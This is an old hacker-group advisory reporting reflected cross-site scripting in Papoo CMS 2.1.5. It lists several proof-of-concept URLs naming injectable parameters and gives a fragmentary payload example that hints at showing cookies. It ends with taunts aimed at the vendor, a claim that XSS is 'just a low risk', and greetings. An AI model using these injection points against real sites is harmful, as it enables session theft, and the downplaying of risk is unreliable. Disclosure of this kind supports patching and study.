k k kkkk kk kkkk k k kkkkkk kkkkkk kkkk k k k k k k k k k k k k k k kk k k k k kk k k k k kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k k k kk k k k k k k k kk k k k k k k k k k k k k kkkk kk kkkk k k kk k k kkkk k kk k k k ]=- Vulnerabilities in Papoo Author : Rusydi Hasan M a.k.a : cR45H3R Date : April,13th 2006 Location : Indonesia, Cilacap ]=- Software description Authors: Carsten Euwens URL : http://www.papoo.de Version: 2.1.5 ]=- The bug XSS a.k.a [C]ross [S]ite [S]cripting ]=- P0C http://[victim]/[papoo_dir]/index.php?menuid=[XSS_here]&reporeid=1 http://[victim]/[papoo_dir]/index.php?menuid=[XSS_here] http://[victim]/[papoo_dir]/forum.php?forumid=21&menuid=[XSS_here] http://[victim]/[papoo_dir]/forum.php?menuid=[XSS_here] http://[victim]/[papoo_dir]/print.php?reporeid_print=[XSS_here]&forumid=1 E[x]ample :'whumpa%20whumpa')%3C/script%3E if the cookie is not shown, just click "refresh" button in your browser ]=- Vendor Mbrrppp, Kaboomm.U dunno pay me right?? LOLZ XSS = just a low risk.Relax, OK?? :P ]=- Shoutz ( ) fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc ( ) y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the day ( ) ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben ]=- Contact crasher@xxxxxxxxxxxx || http://kecoak.or.id